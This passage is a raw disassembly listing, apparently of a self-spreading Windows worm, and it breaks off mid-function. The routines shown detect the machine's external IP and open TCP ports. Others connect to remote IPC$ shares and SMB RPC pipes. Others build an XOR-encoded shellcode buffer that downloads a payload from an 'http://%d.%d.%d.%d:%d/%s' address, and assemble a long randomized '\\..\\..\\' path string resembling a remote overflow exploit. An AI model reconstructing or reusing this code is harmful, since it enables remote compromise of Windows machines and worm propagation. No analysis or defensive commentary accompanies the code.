call sub_9AC33E
push eax
lea eax, [ebp+Str]
push eax ; Str
call strlen
push eax
lea eax, [ebp+Str]
push eax
call sub_9A9237
mov esi, [ebp+Dest]
add esp, 0Ch
push eax
push offset a08x08x ; "%08x%08x"
push ebx ; Count
push esi ; Dest
call _snprintf
add esp, 14h
pop edi
mov byte ptr [esi+ebx-1], 0
pop esi
leave
retn
sub_9AA064 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AA0F1(int,void *Count,int netshort,struct in_addr in)
sub_9AA0F1 proc near ; CODE XREF: sub_9AA27B+45�p
; sub_9AA320+52�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
Memory = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
Count = dword ptr 0Ch
netshort = dword ptr 10h
in = in_addr ptr 14h
push 20h
push offset stru_9A3EB0
call __SEH_prolog
mov eax, dword ptr [ebp+in.S_un]
xor esi, esi
mov [ebp+var_1C], esi
mov [ebp+ms_exc.disabled], esi
mov [ebp+var_28], eax
cmp eax, esi
jz short loc_9AA120
push eax ; in
call inet_ntoa
push eax ; Src
call _strdup
pop ecx
jmp short loc_9AA122
; ---------------------------------------------------------------------------
loc_9AA120: ; CODE XREF: sub_9AA0F1+1C�j
xor eax, eax
loc_9AA122: ; CODE XREF: sub_9AA0F1+2D�j
mov [ebp+Memory], eax
push esi ; int
push esi ; int
push eax ; cp
push 7D0h ; int
call sub_9B611D
add esp, 10h
mov [ebp+var_2C], eax
cmp eax, esi
jz short loc_9AA16B
mov ecx, eax
loc_9AA13E: ; CODE XREF: sub_9AA0F1+56�j
mov [ebp+var_20], ecx
cmp ecx, esi
jz short loc_9AA149
mov ecx, [ecx]
jmp short loc_9AA13E
; ---------------------------------------------------------------------------
loc_9AA149: ; CODE XREF: sub_9AA0F1+52�j
push 10h ; int
push [ebp+netshort] ; netshort
push [ebp+Count] ; Count
push [ebp+arg_0] ; int
push eax ; int
call sub_9B5DA4
add esp, 14h
mov [ebp+var_30], eax
cmp eax, esi
jz short loc_9AA16B
mov [ebp+var_1C], 1
loc_9AA16B: ; CODE XREF: sub_9AA0F1+49�j
; sub_9AA0F1+71�j
push [ebp+Memory] ; Memory
call free
pop ecx
jmp short loc_9AA17E
; ---------------------------------------------------------------------------
loc_9AA177: ; DATA XREF: .text:stru_9A3EB0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AA17B: ; DATA XREF: .text:stru_9A3EB0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AA17E: ; CODE XREF: sub_9AA0F1+84�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9AA0F1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AA18B(int,char *Str2)
sub_9AA18B proc near ; CODE XREF: sub_9AA320+7C�p
Dest = byte ptr -0F8h
Str1 = byte ptr -0B8h
var_68 = dword ptr -68h
var_58 = dword ptr -58h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_3C = dword ptr -3Ch
Memory = byte ptr -34h
var_2F = byte ptr -2Fh
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
Str2 = dword ptr 0Ch
push 0E8h
push offset stru_9A3EC8
call __SEH_prolog
mov edi, ecx
xor ebx, ebx
mov [ebp+ms_exc.disabled], ebx
mov [ebp+var_1C], ebx
loc_9AA1A4: ; CODE XREF: sub_9AA18B+D7�j
push [ebp+var_1C]
push offset aD ; "%d"
push 6 ; Count
lea eax, [ebp+Memory]
push eax ; Dest
call _snprintf
mov [ebp+var_2F], bl
mov [ebp+Dest], bl
mov byte ptr [ebp+var_44], bl
mov byte ptr [ebp+var_58], bl
mov [ebp+Str1], bl
mov byte ptr [ebp+var_28], bl
mov byte ptr [ebp+var_3C], bl
mov byte ptr [ebp+var_68], bl
mov esi, [ebp+arg_0]
add esi, 484h
lea eax, [ebp+var_58]
push eax ; int
lea eax, [ebp+Dest]
push eax ; Dest
lea eax, [ebp+var_44]
push eax ; int
lea eax, [ebp+Str1]
push eax ; int
lea eax, [ebp+var_20]
push eax ; int
lea eax, [ebp+var_3C]
push eax ; int
lea eax, [ebp+var_68]
push eax ; int
lea eax, [ebp+var_28]
push eax ; int
lea eax, [ebp+Memory]
push eax ; Memory
push esi ; int
push dword ptr [edi] ; Str
call sub_9B686F
add esp, 3Ch
mov [ebp+var_2C], eax
cmp eax, ebx
jnz short loc_9AA25C
push [ebp+Str2] ; Str2
lea eax, [ebp+Str1]
push eax ; Str1
call _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_9AA25C
push offset aTcp ; "TCP"
lea eax, [ebp+var_20]
push eax ; Str1
call _stricmp
pop ecx
pop ecx
test eax, eax
jnz short loc_9AA25C
lea eax, [ebp+var_20]
push eax ; int
lea eax, [ebp+var_28]
push eax ; int
push esi ; int
push dword ptr [edi] ; Str
call sub_9B679A
add esp, 10h
mov [ebp+var_48], eax
loc_9AA25C: ; CODE XREF: sub_9AA18B+8E�j
; sub_9AA18B+A4�j ...
inc [ebp+var_1C]
cmp [ebp+var_2C], ebx
jz loc_9AA1A4
jmp short loc_9AA271
; ---------------------------------------------------------------------------
loc_9AA26A: ; DATA XREF: .text:stru_9A3EC8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AA26E: ; DATA XREF: .text:stru_9A3EC8�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AA271: ; CODE XREF: sub_9AA18B+DD�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call __SEH_epilog
retn
sub_9AA18B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AA27B(int,int,struct in_addr in)
sub_9AA27B proc near ; CODE XREF: sub_9ADBF1+115�p
Count = byte ptr -74Ch
var_2C8 = dword ptr -2C8h
Str = dword ptr -48h
netshort = byte ptr -3Ch
var_3B = byte ptr -3Bh
Dest = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
in = in_addr ptr 10h
push 73Ch
push offset stru_9A3ED8
call __SEH_prolog
xor ebx, ebx
mov [ebp+var_1C], ebx
mov [ebp+ms_exc.disabled], ebx
mov [ebp+netshort], bl
xor eax, eax
lea edi, [ebp+var_3B]
stosd
stosd
stosd
stosw
stosb
mov [ebp+Dest], bl
xor eax, eax
lea edi, [ebp+var_2B]
stosd
stosd
stosd
stosw
stosb
push dword ptr [ebp+in.S_un] ; in
lea eax, [ebp+netshort]
push eax ; netshort
lea eax, [ebp+Count]
push eax ; Count
lea eax, [ebp+Str]
push eax ; int
call sub_9AA0F1
add esp, 10h
test eax, eax
jz short loc_9AA313
lea eax, [ebp+Dest]
push eax ; Dest
lea eax, [ebp+var_2C8]
push eax ; int
push [ebp+Str] ; Str
call sub_9B658C
add esp, 0Ch
cmp [ebp+Dest], bl
jz short loc_9AA313
lea eax, [ebp+netshort]
push eax ; cp
mov esi, __imp_inet_addr
call esi ; __imp_inet_addr
mov ecx, [ebp+arg_0]
mov [ecx], eax
lea eax, [ebp+Dest]
push eax ; cp
call esi ; __imp_inet_addr
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov [ebp+var_1C], 1
jmp short loc_9AA313
; ---------------------------------------------------------------------------
loc_9AA30C: ; DATA XREF: .text:stru_9A3ED8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AA310: ; DATA XREF: .text:stru_9A3ED8�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AA313: ; CODE XREF: sub_9AA27B+4F�j
; sub_9AA27B+6A�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9AA27B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AA320(__int16,int,struct in_addr in)
sub_9AA320 proc near ; CODE XREF: sub_9ADBF1+186�p
Count = dword ptr -78Ch
var_308 = dword ptr -308h
var_88 = byte ptr -88h
Str2 = dword ptr -78h
var_58 = dword ptr -58h
netshort = dword ptr -50h
Str = dword ptr -40h
var_34 = dword ptr -34h
Dest = byte ptr -30h
var_2B = byte ptr -2Bh
var_28 = dword ptr -28h
var_23 = byte ptr -23h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = word ptr 8
arg_4 = dword ptr 0Ch
in = in_addr ptr 10h
push 77Ch
push offset stru_9A3EE8
call __SEH_prolog
xor ebx, ebx
mov [ebp+var_20], ebx
mov [ebp+ms_exc.disabled], ebx
mov byte ptr [ebp+netshort], bl
xor eax, eax
lea edi, [ebp+netshort+1]
stosd
stosd
stosd
stosw
stosb
movzx eax, [ebp+arg_0]
push eax
push offset aU ; "%u"
push 6 ; Count
lea eax, [ebp+Dest]
push eax ; Dest
mov edi, _snprintf
call edi ; _snprintf
mov [ebp+var_2B], bl
push dword ptr [ebp+in.S_un] ; in
lea eax, [ebp+netshort]
push eax ; netshort
lea eax, [ebp+Count]
push eax ; Count
lea eax, [ebp+Str]
push eax ; int
call sub_9AA0F1
add esp, 20h
test eax, eax
jz loc_9AA456
lea eax, [ebp+Str2]
push eax
push 20h
pop ebx
call sub_9AA064
lea eax, [ebp+Str2]
push eax ; Str2
lea eax, [ebp+Count]
push eax ; int
lea ecx, [ebp+Str]
call sub_9AA18B
add esp, 0Ch
mov esi, [ebp+arg_4]
mov word ptr [esi], 50h
and [ebp+var_1C], 0
mov ebx, offset aTcp ; "TCP"
loc_9AA3B5: ; CODE XREF: sub_9AA320+121�j
cmp [ebp+var_1C], 3
jge loc_9AA456
movzx eax, word ptr [esi]
push eax
push offset aU ; "%u"
push 6 ; Count
lea eax, [ebp+var_28]
push eax ; Dest
call edi ; _snprintf
mov [ebp+var_23], 0
push ebx ; int
lea eax, [ebp+Str2]
push eax ; int
lea eax, [ebp+netshort]
push eax ; int
lea eax, [ebp+Dest]
push eax ; int
lea eax, [ebp+var_28]
push eax ; int
lea eax, [ebp+var_308]
push eax ; int
push [ebp+Str] ; Str
call sub_9B6663
add esp, 2Ch
mov [ebp+var_34], eax
test eax, eax
jnz short loc_9AA427
lea eax, [ebp+var_58]
push eax ; int
lea eax, [ebp+var_88]
push eax ; Dest
push ebx ; int
lea eax, [ebp+var_28]
push eax ; int
lea eax, [ebp+var_308]
push eax ; int
push [ebp+Str] ; Str
call sub_9B6A70
add esp, 18h
mov [ebp+var_34], eax
test eax, eax
jz short loc_9AA446
loc_9AA427: ; CODE XREF: sub_9AA320+DC�j
call rand
cdq
mov ecx, 2310h
idiv ecx
add edx, 400h
mov [esi], dx
inc [ebp+var_1C]
jmp loc_9AA3B5
; ---------------------------------------------------------------------------
loc_9AA446: ; CODE XREF: sub_9AA320+105�j
mov [ebp+var_20], 1
jmp short loc_9AA456
; ---------------------------------------------------------------------------
loc_9AA44F: ; DATA XREF: .text:stru_9A3EE8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AA453: ; DATA XREF: .text:stru_9A3EE8�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AA456: ; CODE XREF: sub_9AA320+5C�j
; sub_9AA320+99�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_20]
call __SEH_epilog
retn
sub_9AA320 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AA463 proc near ; CODE XREF: sub_9AA572+79�p
cp = byte ptr -38h
var_29 = byte ptr -29h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 28h
push offset stru_9A3F70
call __SEH_prolog
mov edi, ecx
mov esi, edx
or [ebp+var_20], 0FFFFFFFFh
xor ebx, ebx
mov [ebp+ms_exc.disabled], ebx
cmp edi, 10h
jnb short loc_9AA4A8
push 0Fh ; Count
push esi ; Source
lea eax, [ebp+cp]
push eax ; Dest
call strncpy
add esp, 0Ch
mov [ebp+var_29], bl
lea eax, [ebp+cp]
push eax ; cp
call inet_addr
mov [ebp+var_20], eax
cmp eax, ebx
jnz short loc_9AA4A8
or [ebp+var_20], 0FFFFFFFFh
loc_9AA4A8: ; CODE XREF: sub_9AA463+1C�j
; sub_9AA463+3F�j
cmp [ebp+var_20], 0FFFFFFFFh
jnz loc_9AA565
mov [ebp+var_1C], ebx
loc_9AA4B5: ; CODE XREF: sub_9AA463+66�j
cmp [ebp+var_1C], edi
jnb short loc_9AA4CB
mov eax, [ebp+var_1C]
add eax, esi
cmp [eax], bl
jnz short loc_9AA4C6
mov byte ptr [eax], 20h
loc_9AA4C6: ; CODE XREF: sub_9AA463+5E�j
inc [ebp+var_1C]
jmp short loc_9AA4B5
; ---------------------------------------------------------------------------
loc_9AA4CB: ; CODE XREF: sub_9AA463+55�j
mov [esi+edi-1], bl
push esi ; Str
call _strlwr
pop ecx
loc_9AA4D7: ; CODE XREF: sub_9AA463+A5�j
; sub_9AA463+AA�j ...
cmp [ebp+var_20], 0FFFFFFFFh
jnz loc_9AA565
push offset SubStr ; "ip address"
push esi ; Str
call strstr
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_24], esi
cmp esi, ebx
jz short loc_9AA565
add esi, 0Ah
mov [ebp+var_24], esi
xor ecx, ecx
loc_9AA500: ; CODE XREF: sub_9AA463+F9�j
mov [ebp+var_1C], ecx
mov al, [ecx+esi]
cmp al, bl
jz short loc_9AA4D7
cmp ecx, 0Fh
jnb short loc_9AA4D7
cmp al, 30h
jl short loc_9AA55B
cmp al, 39h
jg short loc_9AA55B
mov [ebp+cp], bl
xor edx, edx
loc_9AA51C: ; CODE XREF: sub_9AA463+D9�j
mov [ebp+var_28], edx
cmp edx, 0Fh
jnb short loc_9AA53E
mov al, [ecx+esi]
cmp al, 30h
jl short loc_9AA52F
cmp al, 39h
jle short loc_9AA533
loc_9AA52F: ; CODE XREF: sub_9AA463+C6�j
cmp al, 2Eh
jnz short loc_9AA53E
loc_9AA533: ; CODE XREF: sub_9AA463+CA�j
mov [ebp+edx+cp], al
inc ecx
mov [ebp+var_1C], ecx
inc edx
jmp short loc_9AA51C
; ---------------------------------------------------------------------------
loc_9AA53E: ; CODE XREF: sub_9AA463+BF�j
; sub_9AA463+CE�j
mov [ebp+edx+cp], bl
lea eax, [ebp+cp]
push eax ; cp
call inet_addr
mov [ebp+var_20], eax
cmp eax, ebx
jnz short loc_9AA4D7
or [ebp+var_20], 0FFFFFFFFh
jmp loc_9AA4D7
; ---------------------------------------------------------------------------
loc_9AA55B: ; CODE XREF: sub_9AA463+AE�j
; sub_9AA463+B2�j
inc ecx
jmp short loc_9AA500
; ---------------------------------------------------------------------------
loc_9AA55E: ; DATA XREF: .text:stru_9A3F70�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AA562: ; DATA XREF: .text:stru_9A3F70�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AA565: ; CODE XREF: sub_9AA463+49�j
; sub_9AA463+78�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_20]
call __SEH_epilog
retn
sub_9AA463 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AA572 proc near ; CODE XREF: sub_9ADBF1+250�p
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
dwFlags = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 2Ch
push offset stru_9A3F80
call __SEH_prolog
or [ebp+var_1C], 0FFFFFFFFh
xor ebx, ebx
mov [ebp+var_3C], ebx
xor eax, eax
lea edi, [ebp+var_38]
stosd
stosd
stosd
mov [ebp+ms_exc.disabled], ebx
push ebx ; dwReserved
lea eax, [ebp+dwFlags]
push eax ; lpdwFlags
call InternetGetConnectedState
test eax, eax
jz short loc_9AA615
mov [ebp+var_20], ebx
loc_9AA5A4: ; CODE XREF: sub_9AA572+51�j
; sub_9AA572+9A�j
cmp [ebp+var_1C], 0FFFFFFFFh
jnz short loc_9AA615
cmp [ebp+var_20], 4
jnb short loc_9AA615
call rand
and eax, 3
mov [ebp+dwFlags], eax
shl eax, 2
cmp [ebp+eax+var_3C], ebx
jnz short loc_9AA5A4
push ebx ; int
lea ecx, [ebp+var_28]
push ecx ; int
push off_9BA4E8[eax] ; lpszUrl
call sub_9ACAC1
add esp, 0Ch
mov esi, eax
mov [ebp+var_2C], esi
cmp esi, ebx
jz short loc_9AA5FE
mov ecx, [ebp+var_28]
cmp ecx, 7
jb short loc_9AA5F3
mov edx, esi
call sub_9AA463
mov [ebp+var_1C], eax
loc_9AA5F3: ; CODE XREF: sub_9AA572+75�j
cmp esi, ebx
jz short loc_9AA5FE
push esi ; hMem
call GlobalFree
loc_9AA5FE: ; CODE XREF: sub_9AA572+6D�j
; sub_9AA572+83�j
mov eax, [ebp+dwFlags]
mov [ebp+eax*4+var_3C], 1
inc [ebp+var_20]
jmp short loc_9AA5A4
; ---------------------------------------------------------------------------
loc_9AA60E: ; DATA XREF: .text:stru_9A3F80�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AA612: ; DATA XREF: .text:stru_9A3F80�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AA615: ; CODE XREF: sub_9AA572+2D�j
; sub_9AA572+36�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
inc eax
neg eax
sbb eax, eax
and eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9AA572 endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_9AA62A(size_t Size)
sub_9AA62A proc near ; DATA XREF: .text:pStubDescriptor�o
Size = dword ptr 4
push [esp+Size] ; Size
call malloc
pop ecx
retn 4
sub_9AA62A endp
; ---------------------------------------------------------------------------
loc_9AA638: ; DATA XREF: .text:pStubDescriptor�o
push dword ptr [esp+4]
call free
pop ecx
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AA646 proc near ; CODE XREF: sub_9AD6D4+3D�p
; sub_9AD8BC+51�p
Src = byte ptr -80h
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 80h
mov eax, [ebp+arg_8]
push esi
push offset dword_9BB2D0
push [ebp+arg_C]
mov ecx, eax
shr ecx, 18h
push ecx
movzx ecx, byte ptr [ebp+arg_8+2]
push ecx
movzx ecx, ah
push ecx
and eax, 0FFh
push eax
push offset aHttpD_D_D_DDS ; "http://%d.%d.%d.%d:%d/%s"
lea eax, [ebp+Src]
push 80h ; Count
push eax ; Dest
call _snprintf
lea eax, [ebp+Src]
push eax ; Str
mov [ebp+var_1], 0
call strlen
add esp, 28h
add eax, 0BEh
push eax ; dwBytes
push 40h ; uFlags
call GlobalAlloc
test eax, eax
mov esi, [ebp+arg_0]
mov [esi], eax
jz loc_9AA733
push ebx
push edi
mov edi, 0B9h
push edi ; Size
push offset loc_9BA9F0 ; Src
push eax ; Dst
call memcpy
lea eax, [ebp+Src]
push eax ; Str
call strlen
inc eax
push eax ; Size
lea eax, [ebp+Src]
push eax ; Src
mov eax, [esi]
add eax, edi
push eax ; Dst
call memcpy
push 15h
lea eax, [ebp+Src]
pop edi
push eax ; Str
call strlen
mov ebx, 0BAh
add eax, ebx
add esp, 20h
cmp eax, edi
jbe short loc_9AA70D
loc_9AA6F5: ; CODE XREF: sub_9AA646+C5�j
mov eax, [esi]
add eax, edi
xor byte ptr [eax], 0C4h
lea eax, [ebp+Src]
push eax ; Str
inc edi
call strlen
add eax, ebx
cmp edi, eax
pop ecx
jb short loc_9AA6F5
loc_9AA70D: ; CODE XREF: sub_9AA646+AD�j
mov eax, [esi]
mov byte ptr [edi+eax], 4Dh
mov eax, [esi]
mov byte ptr [eax+edi+1], 53h
mov eax, [esi]
mov byte ptr [eax+edi+2], 0
push dword ptr [esi] ; Str
call strlen
pop ecx
mov ecx, [ebp+arg_4]
mov [ecx], eax
xor eax, eax
pop edi
inc eax
pop ebx
loc_9AA733: ; CODE XREF: sub_9AA646+63�j
pop esi
leave
retn
sub_9AA646 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AA736 proc near ; CODE XREF: sub_9AABAE+83�p
Dest = byte ptr -120h
var_21 = byte ptr -21h
Dst = byte ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 120h
push [ebp+arg_0]
lea eax, [ebp+Dest]
push offset aSIpc_0 ; "\\\\%s\\IPC$"
push 100h ; Count
push eax ; Dest
call _snprintf
push 20h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
mov [ebp+var_21], 0
call memset
add esp, 1Ch
mov eax, offset WindowName ; "recv"
push 0 ; dwFlags
push eax ; lpUserName
push eax ; lpPassword
mov [ebp+var_10], eax
lea eax, [ebp+Dst]
lea ecx, [ebp+Dest]
push eax ; lpNetResource
mov [ebp+var_14], 3
mov [ebp+var_C], ecx
call WNetAddConnection2A
neg eax
sbb eax, eax
inc eax
leave
retn
sub_9AA736 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AA799(RPC_CSTR NetworkAddr,RPC_CSTR Endpoint)
sub_9AA799 proc near ; CODE XREF: sub_9AABAE+9E�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
StringBinding = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
NetworkAddr = dword ptr 8
Endpoint = dword ptr 0Ch
push 14h
push offset stru_9A3FE0
call __SEH_prolog
xor esi, esi
mov [ebp+var_20], esi
mov [ebp+StringBinding], esi
lea eax, [ebp+StringBinding]
push eax ; StringBinding
push esi ; Options
push [ebp+Endpoint] ; Endpoint
push [ebp+NetworkAddr] ; NetworkAddr
push offset ProtSeq ; "ncacn_np"
push esi ; ObjUuid
call RpcStringBindingComposeA
test eax, eax
jnz short loc_9AA7DA
push offset Binding ; Binding
push [ebp+StringBinding] ; StringBinding
call RpcBindingFromStringBindingA
cmp eax, esi
jz short loc_9AA7DE
loc_9AA7DA: ; CODE XREF: sub_9AA799+2D�j
xor eax, eax
jmp short loc_9AA827
; ---------------------------------------------------------------------------
loc_9AA7DE: ; CODE XREF: sub_9AA799+3F�j
mov [ebp+ms_exc.disabled], esi
push esi
push 4
push offset aM ; "M"
push offset aS_0 ; "S"
push offset aAaa ; "AAA"
call sub_9AFF93
add esp, 14h
mov [ebp+var_20], 1
jmp short loc_9AA815
; ---------------------------------------------------------------------------
loc_9AA804: ; DATA XREF: .text:stru_9A3FE0�o
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_24], eax
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AA812: ; DATA XREF: .text:stru_9A3FE0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AA815: ; CODE XREF: sub_9AA799+69�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
push offset Binding ; Binding
call RpcBindingFree
mov eax, [ebp+var_20]
loc_9AA827: ; CODE XREF: sub_9AA799+43�j
call __SEH_epilog
retn
sub_9AA799 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AA82D(int,RPC_CSTR NetworkAddr,RPC_CSTR Endpoint)
sub_9AA82D proc near ; CODE XREF: sub_9AA8E9+269�p
Dst = byte ptr -410h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
StringBinding = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
NetworkAddr = dword ptr 0Ch
Endpoint = dword ptr 10h
push 400h
push offset stru_9A4010
call __SEH_prolog
xor esi, esi
mov [ebp+var_20], esi
mov [ebp+StringBinding], esi
lea eax, [ebp+StringBinding]
push eax ; StringBinding
push esi ; Options
push [ebp+Endpoint] ; Endpoint
push [ebp+NetworkAddr] ; NetworkAddr
push offset ProtSeq ; "ncacn_np"
push esi ; ObjUuid
call RpcStringBindingComposeA
test eax, eax
jnz short loc_9AA871
push offset Binding ; Binding
push [ebp+StringBinding] ; StringBinding
call RpcBindingFromStringBindingA
cmp eax, esi
jz short loc_9AA875
loc_9AA871: ; CODE XREF: sub_9AA82D+30�j
xor eax, eax
jmp short loc_9AA8E3
; ---------------------------------------------------------------------------
loc_9AA875: ; CODE XREF: sub_9AA82D+42�j
mov [ebp+ms_exc.disabled], esi
push 3E8h ; Size
push esi ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call memset
mov [ebp+var_24], 101h
push esi
lea eax, [ebp+var_24]
push eax
push offset asc_9A4008 ; "\\"
push 31Fh
lea eax, [ebp+Dst]
push eax
push [ebp+arg_0]
push offset aHhdhh ; "HHDHH"
call sub_9AFF71
add esp, 28h
mov [ebp+var_20], 1
jmp short loc_9AA8D1
; ---------------------------------------------------------------------------
loc_9AA8C0: ; DATA XREF: .text:stru_9A4010�o
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_28], eax
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AA8CE: ; DATA XREF: .text:stru_9A4010�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AA8D1: ; CODE XREF: sub_9AA82D+91�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
push offset Binding ; Binding
call RpcBindingFree
mov eax, [ebp+var_20]
loc_9AA8E3: ; CODE XREF: sub_9AA82D+46�j
call __SEH_epilog
retn
sub_9AA82D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AA8E9(int,void *Src,size_t Size,int,int)
sub_9AA8E9 proc near ; CODE XREF: sub_9AABAE+125�p
NetworkAddr = byte ptr -88h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Src = dword ptr 0Ch
Size = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 88h
mov eax, [ebp+arg_0]
mov ecx, eax
shr ecx, 18h
push ecx
movzx ecx, byte ptr [ebp+arg_0+2]
push ecx
movzx ecx, ah
push ecx
and eax, 0FFh
push eax
push offset aD_D_D_D ; "\\\\%d.%d.%d.%d"
lea eax, [ebp+NetworkAddr]
push 80h ; Count
push eax ; Dest
call _snprintf
add esp, 1Ch
push ebx
push esi
xor edx, edx
xor eax, eax
mov ecx, 4F8h
push edi
loc_9AA930: ; CODE XREF: sub_9AA8E9+63�j
mov esi, [ebp+arg_C]
cmp dword_9BA4F8[eax], esi
jnz short loc_9AA946
mov edi, dword_9BA4FC[eax]
cmp edi, [ebp+arg_10]
jz short loc_9AA992
loc_9AA946: ; CODE XREF: sub_9AA8E9+50�j
add eax, 18h
inc edx
cmp eax, ecx
jb short loc_9AA930
xor edx, edx
xor eax, eax
loc_9AA952: ; CODE XREF: sub_9AA8E9+80�j
cmp dword_9BA4F8[eax], esi
jnz short loc_9AA963
cmp dword_9BA4FC[eax], 9
jz short loc_9AA992
loc_9AA963: ; CODE XREF: sub_9AA8E9+6F�j
add eax, 18h
inc edx
cmp eax, ecx
jb short loc_9AA952
xor ebx, ebx
loc_9AA96D: ; CODE XREF: sub_9AA8E9+B3�j
test ebx, ebx
jz short loc_9AA98B
cmp [ebp+Size], 190h
ja short loc_9AA98B
push 262h ; dwBytes
call sub_9AC741
mov edi, eax
test edi, edi
pop ecx
jnz short loc_9AA99E
loc_9AA98B: ; CODE XREF: sub_9AA8E9+86�j
; sub_9AA8E9+8F�j
xor eax, eax
jmp loc_9AAB64
; ---------------------------------------------------------------------------
loc_9AA992: ; CODE XREF: sub_9AA8E9+5B�j
; sub_9AA8E9+78�j
lea ebx, [edx+edx*2]
lea ebx, ds:9BA4F8h[ebx*8]
jmp short loc_9AA96D
; ---------------------------------------------------------------------------
loc_9AA99E: ; CODE XREF: sub_9AA8E9+A0�j
push 2 ; Size
push offset asc_9A4008 ; "\\"
push edi ; Dst
call memcpy
add esp, 0Ch
lea esi, [edi+2]
mov [ebp+var_4], 1F4h
loc_9AA9B8: ; CODE XREF: sub_9AA8E9+F4�j
call rand
and al, 1
shl al, 5
or al, 41h
mov byte ptr [ebp+arg_0+3], al
call rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, byte ptr [ebp+arg_0+3]
mov [esi], dl
inc esi
dec [ebp+var_4]
jnz short loc_9AA9B8
push [ebp+Size] ; Size
lea eax, [edi+66h]
push [ebp+Src] ; Src
push eax ; Dst
call memcpy
push 0Eh ; Size
lea eax, [edi+1F6h]
push offset a____ ; "\\..\\..\\"
push eax ; Dst
call memcpy
lea eax, [edi+204h]
mov word ptr [eax], 41h
add esp, 18h
inc eax
inc eax
and [ebp+arg_0], 0
mov [ebp+var_8], eax
lea eax, [edi+206h]
mov esi, 206h
mov [ebp+var_4], eax
loc_9AAA26: ; CODE XREF: sub_9AA8E9+15C�j
; sub_9AA8E9+172�j
call rand
cdq
push 19h
pop ecx
